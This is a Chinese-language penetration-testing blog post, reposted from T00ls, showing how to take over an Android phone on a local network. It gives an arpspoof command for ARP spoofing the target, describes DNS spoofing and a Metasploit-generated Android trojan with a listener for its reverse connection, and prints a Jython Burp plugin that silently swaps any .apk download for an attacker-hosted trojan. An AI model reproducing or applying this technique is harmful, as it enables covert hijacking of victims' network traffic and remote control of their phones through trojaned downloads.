内网渗透之手机控制

admin 2021年7月25日23:24:24评论271 views字数 1010阅读3分22秒阅读模式

作者:loversorry

最近一直在研究从wifi破解到pc及手机控制,给大家分享个手机下载apk替换的方法,还望大牛多多指点!


(一)环境:
目标机:192.168.247.130
渗透机kali:192.168.247.129

网关:192.168.247.2


(二)用到的工具:

1.arpspoof

2.dnsspoof
3.burp

4.jython-burp-api (kali里没有集成,需要另外安装,详细请参见:https://github.com/mwielgoszewski/jython-burp-api)


(三)步骤:

1.使用arpspoof来发送arp欺骗包;

arpspoof -i eth0 -t 192.168.247.130 192.168.247.2


2.使用dnsspoof进行dns欺骗;

内网渗透之手机控制


3.使用msf来生成一个安卓木马;

内网渗透之手机控制


4.msf进行监听,等待木马反弹连接;

内网渗透之手机控制


5.编写python脚本,用于apk下载重定向,代码如下,注意:将这段代码保存到jython-burp-api下的Lib目标下,并命名为testplugin.py;

  1. from gds.burp.api import IProxyRequestHandler

  2. from gds.burp.core import Component, implements

  3. class ExamplePlugin(Component):

  4. implements(IProxyRequestHandler)

  5. def processRequest(self, request):

  6. if ".apk" in request.url.geturl():

  7. print "apk download detected, redirecting"

  8. request.host = "192.168.4.84"

  9. request.raw = ("GET /1.apk HTTP/1.1rn" +

  10. "HOST: 192.168.4.84rnrn")


内网渗透之手机控制


6.编辑jython-burp-api中的burp.ini配置文件;

内网渗透之手机控制


内网渗透之手机控制


7.启动burp,命令:java -Xmx1g -jar burpsutie.jar
8.对burp进行设置

内网渗透之手机控制


内网渗透之手机控制


内网渗透之手机控制


9.在burp里加载jython

内网渗透之手机控制


内网渗透之手机控制


10.当目标开始下载apk的时候,就会替换为我们指定的apk进行下载

内网渗透之手机控制


内网渗透之手机控制


内网渗透之手机控制


11.这时burp中的jython控制台如下:

内网渗透之手机控制


12.当目标安装并运行下载的apk后msf成功收到反弹;

内网渗透之手机控制

本文始发于微信公众号(T00ls):内网渗透之手机控制

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月25日23:24:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透之手机控制http://cn-sec.com/archives/352571.html

发表评论

匿名网友 填写信息